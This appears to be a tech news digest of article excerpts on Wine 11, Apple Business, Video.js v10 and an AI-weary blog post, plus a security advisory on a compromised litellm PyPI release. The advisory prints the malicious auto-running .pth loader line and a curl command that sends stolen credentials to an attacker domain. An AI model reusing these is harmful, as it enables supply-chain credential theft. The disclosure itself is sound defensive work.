Linux gaming has come a long way. When Valve launched Proton back in 2018, it felt like a turning point, turning the Linux gaming experience from “technically possible if you’re okay with a lot of pain” to something that more or less worked. Since then, we’ve seen incremental Wine releases, each one chipping away at compatibility issues and improving performance bit by bit. Wine 10, Wine 9, and so on; each one a collection of bug fixes and small improvements that kept the ecosystem moving forward.
Wine 11 is different. This isn’t just another yearly release with a few hundred bug fixes and some compatibility tweaks. Beyond the usual pile of changes and bug fixes, it ships with NTSYNC support, a feature years in the making that rewrites how Wine handles one of the most performance-sensitive operations in modern gaming. On top of that, the WoW64 architecture overhaul is finally complete, the Wayland driver has grown up a lot, and there’s a big list of smaller improvements that collectively make this feel like an all-new project.
I should be clear: not every game is going to see a night-and-day difference. Some titles will run identically to before. But for the games that do benefit from these changes, the improvements range from noticeable to absurd. And because Proton, SteamOS, and every downstream project builds on top of Wine, those gains trickle down to everyone.
Everything up until now was a workaround
Esync and fsync worked, but they weren’t ideal
If you’ve spent any time tweaking Wine or Proton settings, you’ve probably encountered the terms “esync” and “fsync” before. Maybe you toggled them on in Lutris, or noticed them in Proton launch options, without fully understanding what they do. To understand why NTSYNC matters, you need to understand the problem these solutions were all trying to solve.
Windows games, especially modern ones, are heavily multi-threaded. Your CPU isn’t just running one thing at a time, and instead, it’s juggling rendering, physics calculations, asset streaming, audio processing, AI routines, and more, all in parallel across multiple threads. These threads need to coordinate with each other constantly. One thread might need to wait for another to finish loading a texture before it can render a frame. Another might need exclusive access to a shared resource so two threads don’t try to modify it simultaneously.
Windows handles this coordination through what are called NT synchronization primitives… mutexes, semaphores, events, and the like. They’re baked deep into the Windows kernel, and games rely on them heavily. The problem is that Linux doesn’t have native equivalents that behave exactly the same way. Wine has historically had to emulate these synchronization mechanisms, and the way it did so was, to put it simply, not ideal.
The original approach involved making a round-trip RPC call to a dedicated “kernel” process called wineserver every single time a game needed to synchronize between threads. For a game making thousands of these calls per second, that overhead added up fast and proved to be a real bottleneck, one that manifested as subtle frame stutters, inconsistent frame pacing, and games that just felt a little bit off even when the raw FPS numbers looked fine.
Esync was the first attempt at a workaround. Developed by Elizabeth Figura at CodeWeavers, it used Linux’s eventfd system call to handle synchronization without bouncing through the wineserver. It worked, and it helped, but it had quirks. Some distros ran into issues with file descriptor limits, since every synchronization object needed its own file descriptor, and games that opened a lot of them could hit the system’s ceiling quite quickly.
Fsync came next, using Linux futexes for even better performance. It was faster than esync in most cases, but it required out-of-tree kernel patches that never made it into the mainline Linux kernel or into upstream Wine out of the box. That meant you needed a custom or patched kernel to use it, which is fine for enthusiasts running CachyOS or Proton-GE, but not exactly accessible for the average user on Ubuntu or Fedora. Futex2, often referred to interchangeably with fsync, did land in Linux kernel 5.16 as futex_waitv, but that isn’t the original fsync implementation: fsync used futex_wait_multiple, while Futex2 uses futex_waitv. Applications such as Lutris still refer to it as fsync, though. It’s still kind of fsync, but it’s not the original fsync.
Here’s the thing about both esync and fsync: they were workarounds. Clever ones, but workarounds nonetheless. They approximated NT synchronization behavior using Linux primitives that weren’t designed for the job, and certain edge cases simply couldn’t be handled correctly. Operations like NtPulseEvent() and the “wait-for-all” mode in NtWaitForMultipleObjects() require direct control over the underlying wait queues in ways that user-space implementations just can’t reliably provide.
Synchronization at the kernel level, rather than in user space
NTSYNC takes a completely different approach. Instead of trying to shoehorn Windows synchronization behavior into existing Linux primitives, it adds a new kernel driver that directly models the Windows NT synchronization object API. It exposes a /dev/ntsync device that Wine can talk to, and the kernel itself handles the coordination. No more round trips to wineserver, no more approximations, and the synchronization happens in the kernel, which is where it should be. And it has proper queue management, proper event semantics, and proper atomic operations.
What makes this even better is that NTSYNC was developed by the same person who created esync and fsync in the first place. Elizabeth Figura has been working on this problem for years, iterating through multiple kernel patch revisions, presenting the work at the Linux Plumbers Conference in 2023, and pushing through multiple versions of the patch set before it was finally merged into the mainline Linux kernel with version 6.14.
The numbers are wild. In developer benchmarks, Dirt 3 went from 110.6 FPS to 860.7 FPS, an impressive 678% improvement. Resident Evil 2 jumped from 26 FPS to 77 FPS. Call of Juarez went from 99.8 FPS to 224.1 FPS. Tiny Tina’s Wonderlands saw gains from 130 FPS to 360 FPS. And Call of Duty: Black Ops I is now actually playable on Linux. Those benchmarks compare Wine NTSYNC against upstream vanilla Wine, which means no fsync or esync either. Gamers who already use fsync are not going to see such a leap in performance in most games.
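That 678% figure checks out from the raw frame rates:

```python
def pct_improvement(before_fps, after_fps):
    """Relative FPS gain, as a percentage of the starting frame rate."""
    return (after_fps - before_fps) / before_fps * 100

# Dirt 3: 110.6 FPS -> 860.7 FPS
print(round(pct_improvement(110.6, 860.7)))  # 678
```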
The games that benefit most from NTSYNC are the ones that were struggling before, such as titles with heavy multi-threaded workloads where the synchronization overhead was a genuine bottleneck. For those games, the difference is night and day. And unlike fsync, NTSYNC is in the mainline kernel, meaning you don’t need any custom patches or out-of-tree modules for it to work. Any distro shipping kernel 6.14 or later, which at this point includes Fedora 42, Ubuntu 25.04, and more recent releases, will support it. Valve has already added the NTSYNC kernel driver to the SteamOS 3.7.20 beta, loading the module by default, and an unofficial Proton fork, Proton GE, already has it enabled. When Valve’s official Proton rebases on Wine 11, every Steam Deck owner gets this for free.
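If you want to check whether your own system is ready, a quick best-effort probe might look like this (it assumes the driver exposes /dev/ntsync once loaded, which may not be the case if the module is built but not yet loaded):

```python
import os
import platform

def ntsync_available():
    """Best-effort probe for NTSYNC support. Assumptions: mainline
    support landed in kernel 6.14, and the driver exposes /dev/ntsync
    once the module is loaded."""
    release = platform.release()                  # e.g. '6.14.2-arch1-1'
    major, minor = (int(p) for p in release.split(".")[:2])
    kernel_ok = (major, minor) >= (6, 14)
    device_present = os.path.exists("/dev/ntsync")
    return kernel_ok, device_present

print(ntsync_available())
```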
All of this is what makes NTSYNC such a big deal, as it’s not simply a run-of-the-mill performance patch. Instead, it’s something much bigger: this is the first time Wine’s synchronization has been correct at the kernel level, implemented in the mainline Linux kernel, and available to everyone without jumping through hoops.
If NTSYNC is the headline feature, the completion of Wine’s WoW64 architecture is the change that will quietly improve everyone’s life going forward. On Windows, WoW64 (Windows 32-bit on Windows 64-bit) is the subsystem that lets 32-bit applications run on 64-bit systems. Wine has been working toward its own implementation of this for years, and Wine 11 marks the point where it’s officially done.
What this means in practice is that you no longer need 32-bit system libraries installed on your 64-bit Linux system to run 32-bit Windows applications. Wine handles the translation internally, using a single unified binary that automatically detects whether it’s dealing with a 32-bit or 64-bit executable. The old days of installing multilib packages, configuring ia32-libs, or fighting with 32-bit dependencies on your 64-bit distro are thankfully over.
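As a concrete illustration of that detection step, the 32-bit vs 64-bit distinction is recorded in the Machine field of a Windows executable’s PE header. This is a sketch of reading that field in Python, not Wine’s actual loader code:

```python
import struct

def pe_machine(data: bytes) -> str:
    """Return the CPU target recorded in a PE executable's header.
    This is the same 32-bit vs 64-bit distinction Wine's unified
    binary must make before choosing a code path (sketch only; a real
    loader validates far more than this)."""
    # The DOS header stores e_lfanew at offset 0x3C: the offset of the
    # "PE\0\0" signature. The Machine field follows that signature.
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    machine = struct.unpack_from("<H", data, pe_off + 4)[0]
    return {0x014C: "i386 (32-bit)", 0x8664: "x86-64 (64-bit)"}.get(machine, hex(machine))

# Minimal fake header, just enough to exercise the function:
fake = bytearray(0x50)
struct.pack_into("<I", fake, 0x3C, 0x40)    # e_lfanew -> 0x40
fake[0x40:0x44] = b"PE\x00\x00"
struct.pack_into("<H", fake, 0x44, 0x014C)  # IMAGE_FILE_MACHINE_I386
print(pe_machine(bytes(fake)))              # i386 (32-bit)
```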
This might sound like a small quality-of-life improvement, but it’s a massive piece of engineering work. The WoW64 mode now handles OpenGL memory mappings, SCSI pass-through, and even 16-bit application support. Yes, 16-bit! If you’ve got ancient Windows software from the ’90s that you need to run for whatever reason, Wine 11 has you covered.
For gaming specifically, this matters because a surprising number of games, especially older ones, are 32-bit executables. Previously, getting these to work often meant wrestling with your distro’s multilib setup, which varied in quality and ease depending on whether you were on Ubuntu, Arch, Fedora, or something else entirely. Now, Wine just handles it for you.
The rest of Wine 11 isn’t just filler
There are more fixes, too
It’s easy to let NTSYNC and WoW64 steal the spotlight, but Wine 11 is packed to the gills with other stuff worth talking about.
The Wayland driver has come a long way. Clipboard support now works bidirectionally between Wine and native Wayland applications, which is one of those things you don’t think about until it doesn’t work and it drives you mad. Drag-and-drop from Wayland apps into Wine windows is supported. Display mode changes are now emulated through compositor scaling, which means older games that try to switch to lower resolutions like 640x480 actually behave properly instead of leaving you with a broken desktop. If you’ve been holding off on switching from X11 to Wayland because of Wine compatibility concerns, Wine 11 removes a lot of those barriers.
On the graphics front, EGL is now the default backend for OpenGL rendering on X11, replacing the older GLX path. Vulkan support has been bumped to API version 1.4, and there’s initial support for hardware-accelerated H.264 decoding through Direct3D 11 video APIs using Vulkan Video. That last one is particularly interesting for games and applications that use video playback for things like cutscenes or in-game streaming.
Force feedback support has been improved for racing wheels and flight sticks, which is great news if you’re running a sim setup on Linux. Bluetooth has also received a new driver with BLE services and proper pairing support, MIDI soundfont handling has been improved for legacy game music, and there are a couple of minor extras like Zip64 compression support, Unicode 17.0.0 support, TWAIN 2.0 scanning for 64-bit apps, and IPv6 ping functionality.
Thread priority management has been improved on both Linux and macOS, which helps with multi-threaded application performance beyond just the NTSYNC gains. ARM64 devices can now simulate 4K page sizes on systems with larger native pages, which keeps the door open for Wine on Arm hardware. And with more Arm-based Linux devices showing up every year, that matters more than it used to.
Plus, there are a ton of bug fixes. Games like Nioh 2, StarCraft 2, The Witcher 2, Call of Duty: Black Ops II, Final Fantasy XI, and Battle.net all received specific compatibility fixes, on top of the broader improvements made across the board that will improve performance and compatibility across significantly more titles.
Wine 11 is a big release, and NTSYNC isn’t the only reason. Sure, NTSYNC alone would have made it worth paying attention to, but combined with the WoW64 completion, the Wayland improvements, and the sheer volume of fixes, it’s the most important Wine release since Proton made Linux gaming viable. Everything built on top of Wine, from Proton to Lutris to Bottles, gets better because of it. If you play games on Linux at all, Wine 11 is worth trying out.
...
Read the original on www.xda-developers.com »
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package’s own RECORD:
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('…'))"])
The payload is double base64-encoded. When decoded, it performs the following:
The script collects sensitive data from the host system:
* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz
* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
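The trigger is easy to demonstrate safely: Python’s site module executes any line in a .pth file that starts with "import". This sandboxed sketch reproduces the mechanism in a temporary directory and a child process, so nothing touches real site-packages:

```python
import os
import subprocess
import sys
import tempfile

# Python's site machinery executes any line in a .pth file that begins
# with "import" -- at interpreter startup, before user code runs.
with tempfile.TemporaryDirectory() as d:
    with open(os.path.join(d, "demo.pth"), "w") as f:
        f.write("import sys; sys.stdout.write('pth executed\\n')\n")
    # site.addsitedir runs the same .pth processing the interpreter
    # applies to site-packages at startup.
    out = subprocess.run(
        [sys.executable, "-c", f"import site; site.addsitedir({d!r})"],
        capture_output=True,
        text=True,
    ).stdout

print(out, end="")  # pth executed
```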
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
* Other versions: Not yet checked — the attacker may have compromised multiple releases
Users: Check for litellm_init.pth in your site-packages/ directory
Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
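A quick way to automate the site-packages check is a small script that looks for the known-bad filename in every site-packages directory. It only matches the indicator named in this report, so an empty result is not proof of a clean system:

```python
import pathlib
import site

SUSPICIOUS = "litellm_init.pth"  # indicator from this report

def find_suspicious_pth():
    """Look for the known-bad file in every site-packages directory.
    An empty list only means this particular indicator is absent."""
    dirs = list(site.getsitepackages()) + [site.getusersitepackages()]
    hits = []
    for sp in dirs:
        candidate = pathlib.Path(sp) / SUSPICIOUS
        if candidate.exists():
            hits.append(str(candidate))
    return hits

print(find_suspicious_pth())
```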
...
Read the original on github.com »
At serious risk of sounding like a heretic here, but I’m kinda bored of talking about AI.
I get it, AI is incredible. I use it every day, it’s completely changed my workflow. I recently started a new role in a tricky domain working at web scale (hey, remember web scale?) and it’s allowed me to go from 0-1 in terms of productivity in a matter of weeks.
With that being said, it’s all starting to feel a bit… routine. The pace of change has been incredible, I’m not arguing otherwise, but on a day-to-day basis I’ve sorta run out of things to talk about. What makes this worse is it’s completely taken over mindshare across my section of the internet.
Hacker News, my favourite haunt, used to be full of interesting projects and problems being solved, but this seems to have devolved into three different people’s (almost identical) Claude code workflows and yet another post about how you got OpenClaw to stroke your cat and play video games so you had way more time to… configure AI tooling. This all feels a little self-fulfilling.
Kagi Small Web is another great example of this effect. Here’s a challenge: open it up and press the ‘next’ button 20 times. What percentage of posts are AI related?
Before you write me off as ‘old man yells at cloud’, understand where I’m coming from. In the good old days (2023), before we called anybody who could open a Claude code terminal an ‘AI engineer’, being a ‘Product Engineer’ was the hot new term. The idea was that engineers should move away from obsessing over code to obsessing over the product value they were delivering. I loved this, it made loads of sense to me, but we seem to have regressed. It’s no longer the code we’re obsessing over, it’s the overgrown auto-complete we’ve developed to make the easiest part of being an engineer easier.
It’s like if I went onto the woodworking subreddit and they’d all stopped showing pictures of the tables they’d created and just started posting about the hammer they were using. But they were all using basically the same hammer in the same way, so they were just screaming the same shit at each other at the top of their voices.
What makes this worse is our bosses have bought into it this time too. My managers never cared much about database technologies, IDEs, or JavaScript frameworks; they just wanted the feature so they could sell it. Management seems to have stepped firmly and somewhat haphazardly into the implementation detail now. I reckon most of us have got some sort of company initiative to ‘use more AI’ in our objectives this year. Management’s involvement in the SDLC has always been a thing; DORA metrics have been around for a while. But historically, it’s always been about the outputs: faster deploys, time to respond. Now we’re measuring the number of tokens used per dev, which is no more useful than lines of code ever was.
I guess what I’m saying, other than just having a general whinge, is tell me more about the cool shit you’re building rather than the tools you’re using to build it. And don’t forget that the whole purpose of coding, like any other craft, is to create something that delivers value for someone. Even if that someone is just yourself.
… And yes, I’m painfully aware of the irony of a post about moaning about posts about AI. Sorry.
...
Read the original on blog.jakesaunders.dev »
Introducing Apple Business — a new all‑in‑one platform for businesses of all sizes
Apple Business combines built-in mobile device management, business email and calendar services with custom domain support, and a powerful new option to reach local customers
Apple today announced Apple Business, a new all-in-one platform that includes key services companies need to effortlessly manage devices, reach more customers, equip team members with essential apps and tools, and get support from experts to run and grow efficiently and securely. Apple Business features built-in mobile device management, helping businesses easily configure employee groups, device settings, security, and apps with Blueprints to quickly get started. In addition, customers can now set up business email, calendar, and directory services with their own domain name for seamless and elevated communication and collaboration. And Apple Business can help millions of companies grow their reach and connect with local customers across Apple Maps, Mail, Wallet, Siri, and more, including a new option coming this summer that will enable businesses in the U.S. and Canada to place local ads in Maps during key search and discovery moments. Apple Business will be available starting Tuesday, April 14, in more than 200 countries and regions.1
“Apple Business is a significant leap forward in our decades-long commitment to helping companies of all sizes leverage the power of Apple products and services to run and grow,” said Susan Prescott, Apple’s vice president of Enterprise and Education Marketing. “We’ve unified Apple’s strongest business offerings into one simple, secure platform, delivering key features for organizations in every stage and sector, including built-in device management, collaboration tools, and additional ways to reach new customers. We can’t wait to see how Apple Business helps companies spend more time focusing on what they love and connecting deeply with their communities.”
Apple Business offers built-in mobile device management (MDM), facilitating a comprehensive view of an organization’s Apple devices, settings, and more from a single interface. Previously available as a subscription within Apple Business Essentials in the U.S., MDM is now built in, designed to make IT easy, including for small businesses without dedicated IT resources. Apple Business includes new Blueprints to easily set up devices with preconfigured settings and apps, ensuring consistency and security and enabling zero-touch deployment for employees, so that new Apple products are ready to go out of the box.2
Apple Business includes options to purchase upgraded iCloud storage and support with AppleCare+ for Business, and a companion Apple Business app will allow employees to install apps for work, view colleague contact information, and request support while on the go.3
Apple Business expands the availability of Apple Business Manager to more than 200 countries and regions, and supports additional device management features, including:
* Managed Apple Accounts: Company data remains secure while employee data remains private, with cryptographic separation of work and personal data on devices. Apple Business enables automated Managed Apple Account creation for new employees through integration with an identity service provider, including Google Workspace, Microsoft Entra ID, and more.
* Employee management: Create user groups by function or team to assign apps and roles. Organizations can also create custom roles to manage access exactly the way they want.
* App distribution: Easily acquire and distribute apps to employees and teams through the App Store.
* Admin API: Simplify large deployments with API access to device, user, audit, and MDM service data.
New Ways to Manage Productivity and Collaboration
Apple Business introduces fully integrated email, calendar, and directory services that are designed to make it seamless to start a new business with a professional identity. Businesses can bring their own custom domain name or purchase a new one through Apple Business, helping founders elevate communication and collaboration. These services streamline operations, with scheduling tools like calendar delegation and a built-in company directory to make it easy for employees to connect with user groups and personalized contact cards.
Every day, users choose Apple Maps to discover and explore places and businesses around them. Beginning this summer in the U.S. and Canada, businesses will have a new way to be discovered by using Apple Business to create ads on Maps. Ads on Maps will appear when users search in Maps, and can appear at the top of a user’s search results based on relevance, as well as at the top of a new Suggested Places experience in Maps, which will display recommendations based on what’s trending nearby, the user’s recent searches, and more. Ads will be clearly marked to ensure transparency for Maps users.
Ads on Maps builds on Apple’s broader privacy-first approach to advertising, and maintains the same privacy protections Maps users enjoy today. A user’s location and the ads they see and interact with in Maps are not associated with a user’s Apple Account. Personal data stays on a user’s device, is not collected or stored by Apple, and is not shared with third parties. When Apple Business is available in April, businesses will need to first claim their location on Maps. Once ads on Maps is available, businesses will be able to access a fully automated experience of creating ads through Apple Business in a few simple steps. Current Apple Ads advertisers and agencies will also have the option to book ads through their existing Apple Ads experience, which will offer additional customization options for their ad campaigns.
Brand and Location Features in One Convenient Place
Brand management tools previously available in Apple Business Connect will now be available through Apple Business, making it easier than ever for businesses to set up and manage how their brand and locations appear across Apple services and apps.
* Brand profiles: Manage brand name, logo, and key details consistently across Apple Maps, Wallet, and other features and apps.
* Rich place cards: Customize with photos, detailed location information, hours, and other useful details that display across Apple Maps, Safari, Spotlight, and more.
* Showcases and custom actions: Highlight deals, special offers, new products, or seasonal items on place cards in Maps. Add custom actions like order or reserve to direct customers to a preferred website or app.
* Location insights: Gain valuable insights into how customers discover and interact with businesses on Maps, including search, views, and taps on actions.
* Branded communications: Display branding prominently in the Mail app and on iCloud Mail to increase awareness. Branding will display with tracked orders in Wallet for a more recognizable customer experience.
* Tap to Pay on iPhone: Build trust by displaying a brand logo and name on the payment screen when accepting payments directly on iPhone.
* Starting April 14, Apple Business will be available as a free service in the U.S. and 200+ countries and regions to new and existing users of Apple Business Connect, Apple Business Essentials, and Apple Business Manager. For more information, visit business.apple.com/preview.
* Ads on Apple Maps will be available to businesses starting this summer in the U.S. and Canada. For more information, visit ads.apple.com/maps.
* Apple Business Essentials, Apple Business Manager, and Apple Business Connect will no longer be available once Apple Business launches. Business Essentials customers will no longer be charged their monthly service fee for device management after April 14. Existing Business Connect data — including claimed locations, place card information, photos, organization information, account details, and more — will automatically migrate to Apple Business at launch.
* The Apple Business companion app, along with email, calendar, and directory features, will require iOS 26, iPadOS 26, or macOS 26.
* Customers in the U.S. can purchase additional iCloud storage up to 2TB per user, starting at $0.99 per user per month. AppleCare+ for Business coverage is available per device or per user, starting at $6.99 per month, or $13.99 per month per user for up to three devices.
Apple Business is available globally; certain features may be available in select countries and regions. See business.apple.com/preview for more details.
Zero-touch deployment is available when devices are purchased through Apple or Apple Authorized Resellers.
Additional iCloud storage and AppleCare+ for Business are available as additional paid offerings.
...
Read the original on www.apple.com »
“We are surveilling markets and our approach to market abuse will be to look at the evidence in front of us. I can’t speak for what our US colleagues are doing,” he said.
...
Read the original on www.bbc.com »
Today we’re excited to release the Video.js v10.0.0 beta. It’s the result of a rather large ground-up rewrite, not just of Video.js (discussion) but also of Plyr, Vidstack, and Media Chrome, through a rare teaming-up of open source projects and people who care a lot about web video, with a combined 75,000 github stars and tens of billions of video plays monthly.
I built Video.js 16 years ago to help the transition from Flash to HTML5 video. It’s grown a lot since then with the help of many people, but the codebase and APIs have continued to reflect a different era of web development. This rebuild modernizes the player both for how developers build today and sets up the foundation for the next significant transition to AI-augmented features and development.
* Shrinking bundle sizes, and then shrinking them more (88% reduction in default bundle size)
* Allowing deep customization using the familiar development patterns of your chosen framework — including new first-class React, TypeScript, and Tailwind support
* Making the defaults look beautiful and perform beautifully (The experts are calling me saying “Sir, how did you make it so great?”. It’s incredible, really.)
* Designing the codebase and docs so AI agents building your player alongside you can actually be good at it
We’re pretty sure it works differently from what you’ve come to expect of a web media player, while we hope it feels more familiar to how you actually build.
One of the biggest complaints about video players today is their file size, often weighing in around 1MB minified and hundreds of KB gzipped. Players are sneakily-complex applications so there’s only so many bytes you can shave off, but legacy players were built in times before smart bundlers, tree shaking, and other size-saving opportunities. They carry with them many features you may not be actively using.
The Video.js v10 default player is now 88% smaller than the previous version’s (v8.x.x) default. A good chunk of those savings come from the decision to unbundle adaptive bitrate (ABR) support, which you could remove in the previous version by importing from video.js/core instead, but the majority of video.js installs just use the default bundle while also not using the adaptive streaming features. Comparing more similar apples, with ABR removed, the v10 default video player (HTML) is still 66% smaller than the previous version, getting even smaller from there depending on which bundle you need.
While the previous section was comparing players without ABR, a lot of the weight of a fully-featured video player comes from the streaming engine which is needed to handle adaptive bitrate (ABR) formats like HLS and DASH — for manifest parsing, segment loading, buffer management, ABR logic, codec detection, MSE integration, DRM, server-side ads, and more. Similar to players, traditional streaming engines have monolithic architectures making it difficult to get the bundle size smaller.
As part of v10 we’ve started a new engine project called SPF 😎 (Streaming Processor Framework), which is a framework built around functional components that are composed into purpose-built, smaller streaming engines. For example if you have a short-form video app with simple adaptive streaming needs, your engine won’t ship with any code for DRM and ads.
For a simple HLS use case, Video.js v10 using SPF is only 19% the file size of Video.js v8 including adaptive bitrate streaming (ABR).
Comparing engines to engines you get a clearer picture of the story. The other engines are very difficult to get any smaller without forking them, while the engine composed using SPF only includes what’s needed for simple adaptive streaming using HLS, making it only 12% the file size of even HLS.js-light .
To be clear, the immediate goal isn’t for SPF to replace the full-featured engines like HLS.js for advanced streaming use cases, and in fact v10 works with all these streaming engines today. The goal is to achieve much smaller file sizes for common, simpler use cases. At the same time we think a lot more sites and apps could benefit from simple ABR, and we want SPF to lower the file size cost of using it.
With v10 the file size story doesn’t actually start with the baseline builds. The library is built for composing a player with only what’s needed, allowing for simple use cases to be even smaller.
For example here’s a simple React “hello world” with just a video and play button, weighing in at gzipped .
You could for sure build that example with an even smaller file size, but it’s meant to show that the player infrastructure is minimal, while supporting much more advanced and custom players.
In v10 we first split State, UI, and Media into their own components that work together through API contracts instead of monolithic controllers and overloaded player objects. Each major component is optional and easily swappable or configurable. UI and Media components can also be used just by themselves.
The createPlayer function takes an array of features (like Zustand store slices) to build up its internal state capabilities. If your player doesn’t need audio it doesn’t have to bundle the code for volume and mute. In legacy players this wasn’t possible without forking the code.
Don’t need UI or want to build your own? Just delete the skin, it’s right there in your code. In legacy players, setting controls=false still results in a bundle with all the controls. With v10 if you don’t import a component, it doesn’t exist in your bundle.
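The feature-slice idea is easy to picture in miniature. The sketch below is illustrative only: `createPlayer`, `volumeFeature`, and the object shapes are assumptions made for this example, not the real v10 API.

```javascript
// Illustrative sketch of feature-slice composition. These names and
// shapes are NOT the real Video.js v10 API; they only show the pattern:
// each "feature" contributes a state slice and some methods, and the
// player is built up from exactly the features you pass in.
function createPlayer({ features = [] } = {}) {
  const player = { state: {} };
  for (const feature of features) {
    Object.assign(player.state, feature.state);      // merge initial state slice
    Object.assign(player, feature.methods(player));  // attach methods bound to player
  }
  return player;
}

// A hypothetical volume feature slice.
const volumeFeature = {
  state: { volume: 1, muted: false },
  methods: (player) => ({
    setVolume(v) { player.state.volume = v; },
    toggleMute() { player.state.muted = !player.state.muted; },
  }),
};

// A player built without the volume feature simply has no volume code.
const minimal = createPlayer({ features: [] });
const withAudio = createPlayer({ features: [volumeFeature] });
```

The key property is that a player built without `volumeFeature` carries no volume logic at all, which is what lets a bundler drop the code entirely rather than ship it disabled.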
File size is far from the only important performance metric when it comes to video players, but it’s one that can get away from you quickly if you don’t architect for it upfront. There are still improvements we can make, but we’re really happy with the results of the new architecture so far.
Video.js v10 beta comes with a few polished, complete skins (control sets) you can use out of the box. But we hope you don’t stop there because we’ve put a lot of effort into making the UI components themselves great to work with in any framework. We’ve started with React and Web Components, but hope to move quickly into supporting other popular JS frameworks directly.
When you’re ready to go deeper, you can eject any skin and get the full source code in your framework’s language — real components you own and modify, inspired by shadcn/ui. For Beta “eject” just means copy/paste from the docs, but a fancier CLI option is on the way.
v10’s UI is built with unstyled UI primitives, inspired by libs like Base UI and Radix, which means they get out of your way when you’re trying to do anything custom. Each component outputs a single HTML element, so you have direct access to everything happening in the UI.
They’re more verbose, and as a long-time HTML-er I’ll admit I was not a fan at first glance. But after building a player skin with them, I understood why this is the way. For example, in the previous version (v8) the timeline thumb/handle was a pseudo-element on a nested child. You overrode it through inspecting the player’s output, using specificity and a font-size for dimensions.
In v10, it’s a real element with a class you control.
The previous version’s default skin is used billions of times every month, and yet we put relatively little design effort into it. At the time I hoped devs would style it and make it their own, and then they didn’t.
For v10, Sam Potts (creator of Plyr, 29,000 GitHub stars largely on the strength of its design) designed the new skins, and will continue to invest in and iterate on them over time. The beta ships two skins: a default skin with a frosted aesthetic and a minimal skin for developers who want a clean starting point, both with refined controls, smooth interactions, and thoughtful animations.
One detail I love is the error dialog, where the visual treatment matches the skin. I’m sure that feels tiny and simple, but in Video.js history this level of detail was so far down the priority list that for a decade the error dialog has been my big ugly text ‘X’, for every skin. So when I see these new error dialogs it helps confirm we’re all setting the bar higher, and I’m loving it.
Amazon.com featuring the version 8 error dialog “X” (I forced the error for the screenshot)
While these beta skins are a great starting point, they’re just the beginning.
If you wanted to build a podcast player with Video.js v8, you’d start with a video player, strip out the video-specific parts, add some specific audio features, and then spend real time on UI customization to get something that actually looked and felt like a podcast player. Same story for a background video on a landing page, or a short-form swipeable player, or a classroom course player.
We do actually know what people are building, believe it or not. Not just the individual features, but the specific combinations that tend to show up together. A TV streaming app needs different things than a hero background video, which needs different things than a podcast player. And those combinations are pretty consistent across the web.
So in v10 we’re packaging them up as presets. A preset is a purpose-built combination of skin, features, and media configuration for a specific use case. Instead of assembling a player from scratch, you’ll pick the preset closest to what you’re building and start there.
* A default video preset (general website video, the kind of thing you might otherwise use the HTML video tag for)
* A default audio preset (same idea but for the audio tag)
* A background video preset

Background video is where this concept really starts to click, because a background video needs layout but doesn’t need controls and doesn’t need audio. Rather than handing you a full player and asking you to remove things, we just give you the right player for the job.
This is also where the compositional architecture pays off. The preset gets you started fast. The composable foundation underneath means you can still add, remove, or replace anything. You get a real starting point without giving up any of the flexibility.
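Conceptually, a preset can be as simple as a named bundle of skin, features, and media configuration that you can still override piece by piece. The names below are hypothetical, not the shipped preset API:

```javascript
// Illustrative sketch of a preset as a plain configuration bundle.
// None of these names are the real v10 API; they show the idea that a
// preset is a starting point, not a locked box.
const backgroundVideoPreset = {
  skin: null,                         // background video ships no controls
  features: ['autoplay', 'loop'],     // hypothetical feature names
  media: { muted: true, playsinline: true },
};

// Applying a preset is just merging it with user overrides, so the
// composable foundation underneath stays fully reachable.
function applyPreset(preset, overrides = {}) {
  return {
    ...preset,
    ...overrides,
    media: { ...preset.media, ...overrides.media },
  };
}

const player = applyPreset(backgroundVideoPreset, { features: ['autoplay'] });
```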
Over time we’ll expand into more use cases: creator-platform players, short-form swipeable video, educational course players. If there’s a use case you’d love to see, let us know.
The last year, and even just the last few months, have been a wild time to be building a new project like this. We’re of course excited about how AI will create interesting interactive player features in the months and years to come, and we have a few ideas of what those will be. For Beta, however, we’ve been focused on the agent experience of building Video.js-based players with the help of AI.
* Less-abstracted components and unstyled UI primitives so agents can do more with the code right in your project and need fewer external docs
* Markdown versions of every individual doc. If your agent hits our site with the accept: text/markdown header — as many like Claude Code do — we’ll send the markdown version of the page, saving your agent loads of unnecessary context bloat.
* A growing set of AI skills in the repo, currently helping us build and soon to help you build too.
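The markdown-for-agents behavior described above is ordinary HTTP content negotiation on the Accept header. A minimal sketch of the mechanism (not the actual videojs.org server code):

```javascript
// Minimal sketch of Accept-header content negotiation, the mechanism
// behind serving markdown to agents. Not the real videojs.org server.
function negotiate(acceptHeader, page) {
  // Does any media type in the Accept header match text/markdown?
  const wantsMarkdown = (acceptHeader || '')
    .split(',')
    .some((type) => type.trim().split(';')[0] === 'text/markdown');
  return wantsMarkdown
    ? { contentType: 'text/markdown', body: page.markdown }
    : { contentType: 'text/html', body: page.html };
}

const page = { markdown: '# Docs', html: '<h1>Docs</h1>' };

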